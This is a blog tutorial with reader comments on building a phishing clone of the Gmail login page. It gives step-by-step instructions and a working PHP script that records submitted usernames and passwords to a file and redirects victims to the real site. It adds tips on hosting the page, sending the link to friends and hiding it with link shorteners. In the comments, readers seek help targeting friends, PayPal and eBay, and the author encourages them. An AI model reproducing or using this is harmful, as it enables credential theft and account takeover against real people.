Phishing is an art of stealing credential details or password and username of the user by providing him the similar or look-alike page that he uses to enter a password or credential details.

There are a lot of ways of doing Phishing but we will be focusing on the method that is simple and does not require any programming knowledge i.e this method can be used and applied by anyone from freelancer to a programmer.

Earlier in one of my post I have explained the method to make a Phishing Page for Facebook and now I will be telling you how you can make phishing page for Gmail..Although you may think that teaching to make phishing page is a crime but wait I am only teaching you to make phishing page only for Fun and educational purpose..!!!!page

Again this tutorial is very easy just like the previous one and  doesn’t require any knowledge of programming.All you have to do is just follow the steps

Phishing page for Gmail

[su_note note_color=”#f38e9c” text_color=”#000000″ radius=”11″]NOTE: This tutorial is for Education Purpose only don’t misuse it,We will not hold any responsibility if it is being misused and please don’t use this tutorial for illegal activities!!

Find out: How to Protect yourself from Phishing[/su_note]

Step 1:

Open gmail.com and right click on the page. You will see many options, just select view source.

Phishing Page for Gmail-view source

Step 2:

Now simply copy the entire code (press CTRL+A and then CTRL+C of your keyboard for copying the entire code). After copying the code open notepad and paste the code by pressing CTRL+V.

Phishing Page for Gmail-Change action

 

Step 3:

Scroll to the top and press CTRL+F of your keyboard. You will get a dialogue box on your screen. Simply type “action=” in the space provided without inverted commas. And hit enter.Replace the link corresponding to action= with post.php see image below,it will make it clearer.

Phishing Page for Gmail-

Save the notepad file with a name index.html. If you get a warning then press ok.

Step 4:

Open a new notepad file and simply copy and paste the below code. You can also modify the code as this code redirects the victims to a new page after he enters his password and username.

If you want the user to get redirected to original/genuine gmail.com page after writing his password and user name leave it as it is and if you want to redirect the victim to some new site replace “https://www.gmail.com/” with desired site name in the below code.

<?php header ('Location:https://www.gmail.com/'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) {    fwrite($handle, $variable);    fwrite($handle, "=");    fwrite($handle, $value);    fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

 

Save the file as post.php

Step 5:

Now you have completes making your Phishing page ,open index.html to see your phishing page.

When you will open index.html you will see that your phishing page is not as same as Gmail original/genuine page ,it is missing many images and logo.Phishing Page for Gmail-Changing avatar

So,it’s time to fix them.

All you have to do is open index.html in notepad .Just make a right click on index.html and hover over open with and select notepad.

Press CTRL+F of your keyword to find the following links and replace the following links with corresponding links:

  • Firstly Find: //ssl.gstatic.com/accounts/ui/logo_2x.png for fixing Google logo.
  • Replace it with: https://i.imgur.com/8aPqK7U.png
  • Secondly, Find: //ssl.gstatic.com/accounts/ui/avatar_2x.png for fixing avatar.
  • Replace it with: https://i.imgur.com/cADQ5wi.png
  • Thirdly Find: //ssl.gstatic.com/accounts/ui/logo_strip_2x.png for fixing logo strip
  • And replace it with: https://i.imgur.com/O1V8kOU.png
  • Lastly Find: //ssl.gstatic.com/images/icons/ui/common/universal_language_settings-21.png for fixing language icon.
  • And replace it with: https://i.imgur.com/2reaCDM.png

Now save your work and again open index.html by double clicking and you will see all the things have been fixed and your page looks exactly like original Gmail page.Phishing Page for Gmail-Avatar fixed

Now its time to host your gmail phishing page(both index.html and post.php) in free hosting sites which is again very simple.

Just see the tutorial :Uploading your Phishing Site to Free hosting site!

And start following the steps from step 7.

After uploading the files all you have to do is start spreading your link to your friends and whenever they will click on the link they will be redirected to gmail.com and whenever they will enter the username and password you will also get the username and password of your friend.This finishes the Tutorial of making Phishing page for Gmail…!!

Note: You can shorten your link with link shortening sites so that victim don’t get to know that the link is from a free hosting site. Or you can buy hosting from : Ipage Hosting and get your Phishing Page going…!!

58 COMMENTS

  1. Hello mohit,
    i made the phishing page, but when i click the link and enter the password it shows like this..(see below)
    =============================================================================================
    PHP Error Message

    Parse error: syntax error, unexpected T_STRING in /home/a6991743/public_html/post.php on line 1

    Free Web Hosting
    ==============================================================================================
    so is there anything wrong ??
    and im lack of how to use hosting…i made a account in 000webhost.com and i upload both files to it..after that im lost..what to do next. how im tarck the login details of others when they sign in using my link.
    please can you help me

    Best tegards.

  2. I cannot make this steps because of the new gmail design in 2016 because they made the email entry in a page and the password in another page ……… so what can i do

  3. Yo dude, if you still have the index.html code from that date can u post it/ mail it to me?
    I have some dumbass friends who would still believe it.
    thnx

  4. Hello. I would like to know if one can use this tutorial to create phishing site for any site like ebay or paypal? Or does each site has different protection and this one tutorial won’t help with anything else except gmail? And also, can created phishing site be opened via mobile phone? Thank you very much.

    • Hi,
      You can for sure use this tutorial for making phishing page for PayPal or ebay, but you should be knowing little bit of CSS in order to completely make a phishing page for the mentioned sites!
      Thanks

  5. Hey! It works 100%, I tested it. However, Facebook will give a warning right away that there’s a security breach and that I need to reset my password. How can this be prevented? Also, the text target is currently using a mobile phone. Does this work on mobile?

  6. Hey Mohit.

    These instructions still work. However, after an email is submitted and the user selects “next”, the page just goes to an error page for the file hosting (tried both 000webhost and hostinger).

    Know how to fix these?

    • Hi Justin,

      This problem is caused because Gmail no works with two-step authentication process. You may be able to get a Gmail user id of the victim but not a password. Stay with me and i will for sure come up with the new article on two step authentication process.

      Thanks

  7. Wait, so, what people here in the comments are saying is that this doesn’t work anymore? Because gmail now goes to a second page to insert the password?
    If so, does anyone here has the old Gmail index.html? It’s not so different and a lot of people might still fall for it…

  8. Hi Mohit.
    I just want to thank you. I love your post, so much luck with this work and hope you soon make the new post about this topic. I am looking forward it.

  9. can you provide that source code of gmail cause gmail has changed it look and now it just shows email alone

LEAVE A REPLY

Please enter your comment!
Please enter your name here